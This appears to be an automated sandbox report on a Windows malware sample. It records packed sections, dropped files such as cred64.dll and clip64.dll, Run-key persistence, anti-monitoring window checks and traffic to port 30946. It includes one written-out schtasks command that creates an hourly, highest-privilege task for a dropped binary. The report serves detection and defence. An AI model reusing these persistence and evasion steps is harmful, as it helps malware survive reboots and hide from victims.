                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeUnpacked PE file: 15.2.chrosha.exe.70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fbupybke:EW;ejxqaids:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fbupybke:EW;ejxqaids:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeUnpacked PE file: 20.2.c884f8452a.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeUnpacked PE file: 28.2.MPGPH131.exe.890000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeUnpacked PE file: 29.2.MPGPH131.exe.890000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeUnpacked PE file: 36.2.c884f8452a.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeUnpacked PE file: 45.2.RageMP131.exe.370000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeUnpacked PE file: 51.2.c884f8452a.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
                              Source: build12[1].exe.50.drStatic PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
                              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                              Source: cred64[1].dll.50.drStatic PE information: real checksum: 0x0 should be: 0x14356f
                              Source: build12.exe0.50.drStatic PE information: real checksum: 0x0 should be: 0x1f60e
                              Source: cred64[1].dll.6.drStatic PE information: real checksum: 0x0 should be: 0x147ee8
                              Source: amert.exe.6.drStatic PE information: real checksum: 0x1d614a should be: 0x1d4933
                              Source: chrosha.exe.14.drStatic PE information: real checksum: 0x1d614a should be: 0x1d4933
                              Source: clip64.dll.50.drStatic PE information: real checksum: 0x0 should be: 0x2272f
                              Source: explorha.exe.0.drStatic PE information: real checksum: 0x2d5a1e should be: 0x2d41c5
                              Source: clip64.dll.6.drStatic PE information: real checksum: 0x0 should be: 0x1f783
                              Source: build12.exe.50.drStatic PE information: real checksum: 0x0 should be: 0x1f60e
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: real checksum: 0x2d5a1e should be: 0x2d41c5
                              Source: amert[1].exe.6.drStatic PE information: real checksum: 0x1d614a should be: 0x1d4933
                              Source: clip64[1].dll.6.drStatic PE information: real checksum: 0x0 should be: 0x1f783
                              Source: build12[1].exe.50.drStatic PE information: real checksum: 0x0 should be: 0x1f60e
                              Source: clip64[1].dll.50.drStatic PE information: real checksum: 0x0 should be: 0x2272f
                              Source: cred64.dll.50.drStatic PE information: real checksum: 0x0 should be: 0x14356f
                              Source: cred64.dll.6.drStatic PE information: real checksum: 0x0 should be: 0x147ee8
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: section name:
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: section name: .idata
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: section name: wvtamnbw
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: section name: jjaorssu
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: section name: .taggant
                              Source: explorha.exe.0.drStatic PE information: section name:
                              Source: explorha.exe.0.drStatic PE information: section name: .idata
                              Source: explorha.exe.0.drStatic PE information: section name: wvtamnbw
                              Source: explorha.exe.0.drStatic PE information: section name: jjaorssu
                              Source: explorha.exe.0.drStatic PE information: section name: .taggant
                              Source: cred64[1].dll.6.drStatic PE information: section name: _RDATA
                              Source: cred64.dll.6.drStatic PE information: section name: _RDATA
                              Source: amert[1].exe.6.drStatic PE information: section name:
                              Source: amert[1].exe.6.drStatic PE information: section name: .idata
                              Source: amert[1].exe.6.drStatic PE information: section name:
                              Source: amert[1].exe.6.drStatic PE information: section name: fbupybke
                              Source: amert[1].exe.6.drStatic PE information: section name: ejxqaids
                              Source: amert[1].exe.6.drStatic PE information: section name: .taggant
                              Source: amert.exe.6.drStatic PE information: section name:
                              Source: amert.exe.6.drStatic PE information: section name: .idata
                              Source: amert.exe.6.drStatic PE information: section name:
                              Source: amert.exe.6.drStatic PE information: section name: fbupybke
                              Source: amert.exe.6.drStatic PE information: section name: ejxqaids
                              Source: amert.exe.6.drStatic PE information: section name: .taggant
                              Source: random[1].exe0.6.drStatic PE information: section name:
                              Source: random[1].exe0.6.drStatic PE information: section name: .idata
                              Source: random[1].exe0.6.drStatic PE information: section name:
                              Source: random[1].exe0.6.drStatic PE information: section name: ejwyeyni
                              Source: random[1].exe0.6.drStatic PE information: section name: zoeuqxwb
                              Source: c884f8452a.exe.6.drStatic PE information: section name:
                              Source: c884f8452a.exe.6.drStatic PE information: section name: .idata
                              Source: c884f8452a.exe.6.drStatic PE information: section name:
                              Source: c884f8452a.exe.6.drStatic PE information: section name: ejwyeyni
                              Source: c884f8452a.exe.6.drStatic PE information: section name: zoeuqxwb
                              Source: sarra[1].exe.6.drStatic PE information: section name:
                              Source: sarra[1].exe.6.drStatic PE information: section name: .idata
                              Source: sarra[1].exe.6.drStatic PE information: section name:
                              Source: sarra[1].exe.6.drStatic PE information: section name: oavneyqq
                              Source: sarra[1].exe.6.drStatic PE information: section name: ixcwzfpc
                              Source: chrosha.exe.14.drStatic PE information: section name:
                              Source: chrosha.exe.14.drStatic PE information: section name: .idata
                              Source: chrosha.exe.14.drStatic PE information: section name:
                              Source: chrosha.exe.14.drStatic PE information: section name: fbupybke
                              Source: chrosha.exe.14.drStatic PE information: section name: ejxqaids
                              Source: chrosha.exe.14.drStatic PE information: section name: .taggant
                              Source: RageMP131.exe.20.drStatic PE information: section name:
                              Source: RageMP131.exe.20.drStatic PE information: section name: .idata
                              Source: RageMP131.exe.20.drStatic PE information: section name:
                              Source: RageMP131.exe.20.drStatic PE information: section name: ejwyeyni
                              Source: RageMP131.exe.20.drStatic PE information: section name: zoeuqxwb
                              Source: MPGPH131.exe.20.drStatic PE information: section name:
                              Source: MPGPH131.exe.20.drStatic PE information: section name: .idata
                              Source: MPGPH131.exe.20.drStatic PE information: section name:
                              Source: MPGPH131.exe.20.drStatic PE information: section name: ejwyeyni
                              Source: MPGPH131.exe.20.drStatic PE information: section name: zoeuqxwb
                              Source: cred64[1].dll.50.drStatic PE information: section name: _RDATA
                              Source: cred64.dll.50.drStatic PE information: section name: _RDATA
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00B929A0 push esp; ret 0_2_00B929A1
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00B89420 push ebx; ret 0_2_00B8942A
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00B88DE6 push esi; iretd 0_2_00B88DE7
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00B9EFBC push ecx; ret 0_2_00B9EFCF
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_0070C0E8 push cs; retn 0002h2_2_0070C0E9
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_00709420 push ebx; ret 2_2_0070942A
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_00708DE6 push esi; iretd 2_2_00708DE7
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_0071EFBC push ecx; ret 2_2_0071EFCF
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_0070C0E8 push cs; retn 0002h3_2_0070C0E9
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_00709420 push ebx; ret 3_2_0070942A
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_00708DE6 push esi; iretd 3_2_00708DE7
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 3_2_0071EFBC push ecx; ret 3_2_0071EFCF
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848CB00BD pushad ; iretd 11_2_00007FF848CB00C1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848D8CACC push eax; retf 0000h11_2_00007FF848D8CAD5
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848D8CA9F push 140000C9h; retf 0000h11_2_00007FF848D8CAB1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848D80DB9 push eax; ret 11_2_00007FF848D80DD9
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848D8CF30 push eax; iretd 11_2_00007FF848D8CF61
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeCode function: 14_2_0037D28C push ecx; ret 14_2_0037D29F
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: section name: entropy: 7.974297481762842
                              Source: explorha.exe.0.drStatic PE information: section name: entropy: 7.974297481762842
                              Source: amert[1].exe.6.drStatic PE information: section name: entropy: 7.980367322356868
                              Source: amert[1].exe.6.drStatic PE information: section name: fbupybke entropy: 7.952909089297466
                              Source: amert.exe.6.drStatic PE information: section name: entropy: 7.980367322356868
                              Source: amert.exe.6.drStatic PE information: section name: fbupybke entropy: 7.952909089297466
                              Source: random[1].exe0.6.drStatic PE information: section name: entropy: 7.9276781775055
                              Source: random[1].exe0.6.drStatic PE information: section name: ejwyeyni entropy: 7.949249760690904
                              Source: c884f8452a.exe.6.drStatic PE information: section name: entropy: 7.9276781775055
                              Source: c884f8452a.exe.6.drStatic PE information: section name: ejwyeyni entropy: 7.949249760690904
                              Source: sarra[1].exe.6.drStatic PE information: section name: entropy: 7.927704281329572
                              Source: sarra[1].exe.6.drStatic PE information: section name: oavneyqq entropy: 7.951558451221909
                              Source: chrosha.exe.14.drStatic PE information: section name: entropy: 7.980367322356868
                              Source: chrosha.exe.14.drStatic PE information: section name: fbupybke entropy: 7.952909089297466
                              Source: RageMP131.exe.20.drStatic PE information: section name: entropy: 7.9276781775055
                              Source: RageMP131.exe.20.drStatic PE information: section name: ejwyeyni entropy: 7.949249760690904
                              Source: MPGPH131.exe.20.drStatic PE information: section name: entropy: 7.9276781775055
                              Source: MPGPH131.exe.20.drStatic PE information: section name: ejwyeyni entropy: 7.949249760690904
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile created: C:\ProgramData\MPGPH131\MPGPH131.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeJump to dropped file
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeFile created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sarra[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeFile created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile created: C:\ProgramData\MPGPH131\MPGPH131.exeJump to dropped file

                              Boot Survival

                              barindex
                              Creates multiple autostart registry keys
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 831840b410.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c884f8452a.exeJump to behavior
                              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeWindow searched: window name: RegmonclassJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeWindow searched: window name: FilemonclassJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: RegmonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: FilemonClassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: RegmonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: FilemonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow searched: window name: RegmonclassJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: RegmonClass
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: FilemonClass
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: Filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: Regmonclass
                              Uses schtasks.exe or at.exe to add and modify task schedules
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeFile created: C:\Windows\Tasks\explorha.jobJump to behavior
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 831840b410.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 831840b410.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c884f8452a.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c884f8452a.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Loading BitLocker PowerShell Module
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Uses known network protocols on non-standard ports
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49883
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49889
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49883
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49889
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49889
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49883
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49998
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49997
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49998
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 49997
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50461 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50461 -> 30946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50094
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50095
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50094
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50095
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50094
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50095
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50094
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50095
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50094
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50095
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50094
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50461
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50462
                              Source: unknownNetwork traffic detected: HTTP traffic on port 30946 -> 50461
